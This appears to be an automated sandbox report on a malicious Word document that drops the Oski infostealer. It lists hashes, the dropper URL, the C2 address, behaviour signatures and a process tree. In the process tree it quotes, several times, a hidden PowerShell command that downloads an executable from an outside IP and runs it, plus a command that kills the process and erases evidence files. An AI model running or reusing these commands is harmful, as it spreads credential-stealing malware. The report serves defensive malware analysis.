Analysis

  • max time kernel
    148s
  • max time network
    87s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    03/08/2021, 08:39

General

  • Target

    T31597377-Confirm-20210802-100016-Email-5007377.doc

  • Size

    229KB

  • MD5

    5dda83e206429216662517f5f4ba7718

  • SHA1

    abbd782fa3cd388e66e7739b65abddfcaf0071fc

  • SHA256

    190a90d648e64c0f6c80a36bf00c5f2fdb8247260f5f38dfc13895b28f1c7fc2

  • SHA512

    c8d0e5461219e832a376396bd5270b1380cca65515a453c2c911f3c9355aa86a855d07d26ce015dd7ed106e3b0617b98d2a951cfb771187274a48d0231a300c1

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://185.230.160.197/images/images.exe

Extracted

Family

oski

C2

http://2.56.59.226/www/

Signatures

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 12 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\T31597377-Confirm-20210802-100016-Email-5007377.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:288
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Users\Admin\AppData\Roaming\images.exe
        "C:\Users\Admin\AppData\Roaming\images.exe"
        3⤵
        • Executes dropped EXE
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Users\Admin\AppData\Roaming\images.exe
          "C:\Users\Admin\AppData\Roaming\images.exe"
          4⤵
          • Executes dropped EXE
          PID:1504
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Users\Admin\AppData\Roaming\images.exe
        "C:\Users\Admin\AppData\Roaming\images.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1404
        • C:\Users\Admin\AppData\Roaming\images.exe
          "C:\Users\Admin\AppData\Roaming\images.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /pid 1660 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\943401550568339\\* & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /pid 1660
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Users\Admin\AppData\Roaming\images.exe
        "C:\Users\Admin\AppData\Roaming\images.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\Users\Admin\AppData\Roaming\images.exe
          "C:\Users\Admin\AppData\Roaming\images.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /pid 1456 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\496765114840226\\* & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /pid 1456
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:936
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2024

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/288-62-0x00000000753E1000-0x00000000753E3000-memory.dmp

            Filesize

            8KB

          • memory/288-59-0x0000000072881000-0x0000000072884000-memory.dmp

            Filesize

            12KB

          • memory/288-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/288-60-0x0000000070301000-0x0000000070303000-memory.dmp

            Filesize

            8KB

          • memory/676-104-0x00000000062E0000-0x00000000062E1000-memory.dmp

            Filesize

            4KB

          • memory/676-68-0x0000000004862000-0x0000000004863000-memory.dmp

            Filesize

            4KB

          • memory/676-100-0x0000000006240000-0x0000000006241000-memory.dmp

            Filesize

            4KB

          • memory/676-67-0x0000000004860000-0x0000000004861000-memory.dmp

            Filesize

            4KB

          • memory/676-70-0x0000000005250000-0x0000000005251000-memory.dmp

            Filesize

            4KB

          • memory/676-88-0x0000000006160000-0x0000000006161000-memory.dmp

            Filesize

            4KB

          • memory/676-73-0x0000000005660000-0x0000000005661000-memory.dmp

            Filesize

            4KB

          • memory/676-81-0x00000000060B0000-0x00000000060B1000-memory.dmp

            Filesize

            4KB

          • memory/676-66-0x00000000048A0000-0x00000000048A1000-memory.dmp

            Filesize

            4KB

          • memory/676-69-0x00000000020F0000-0x00000000020F1000-memory.dmp

            Filesize

            4KB

          • memory/676-76-0x000000007EF30000-0x000000007EF31000-memory.dmp

            Filesize

            4KB

          • memory/676-65-0x00000000004C0000-0x00000000004C1000-memory.dmp

            Filesize

            4KB

          • memory/1404-142-0x0000000004FE7000-0x0000000004FF8000-memory.dmp

            Filesize

            68KB

          • memory/1404-140-0x0000000004FE2000-0x0000000004FE3000-memory.dmp

            Filesize

            4KB

          • memory/1404-137-0x0000000004FE1000-0x0000000004FE2000-memory.dmp

            Filesize

            4KB

          • memory/1404-135-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

            Filesize

            4KB

          • memory/1504-103-0x0000000001F30000-0x0000000002B7A000-memory.dmp

            Filesize

            12.3MB

          • memory/1504-123-0x0000000006260000-0x0000000006261000-memory.dmp

            Filesize

            4KB

          • memory/1568-120-0x0000000001050000-0x0000000001051000-memory.dmp

            Filesize

            4KB

          • memory/1568-125-0x0000000004870000-0x0000000004871000-memory.dmp

            Filesize

            4KB

          • memory/1568-175-0x0000000004877000-0x0000000004888000-memory.dmp

            Filesize

            68KB

          • memory/1568-139-0x0000000004872000-0x0000000004873000-memory.dmp

            Filesize

            4KB

          • memory/1568-138-0x0000000004871000-0x0000000004872000-memory.dmp

            Filesize

            4KB

          • memory/1660-146-0x0000000000400000-0x000000000047F000-memory.dmp

            Filesize

            508KB

          • memory/1660-173-0x0000000000400000-0x000000000047F000-memory.dmp

            Filesize

            508KB

          • memory/1688-101-0x0000000004960000-0x0000000004961000-memory.dmp

            Filesize

            4KB

          • memory/1688-102-0x0000000004962000-0x0000000004963000-memory.dmp

            Filesize

            4KB

          • memory/1936-174-0x0000000004917000-0x0000000004928000-memory.dmp

            Filesize

            68KB

          • memory/1936-134-0x0000000004910000-0x0000000004911000-memory.dmp

            Filesize

            4KB

          • memory/1936-143-0x0000000005BE0000-0x0000000005C5E000-memory.dmp

            Filesize

            504KB

          • memory/1936-141-0x0000000004912000-0x0000000004913000-memory.dmp

            Filesize

            4KB

          • memory/1936-136-0x0000000004911000-0x0000000004912000-memory.dmp

            Filesize

            4KB

          • memory/2024-182-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp

            Filesize

            8KB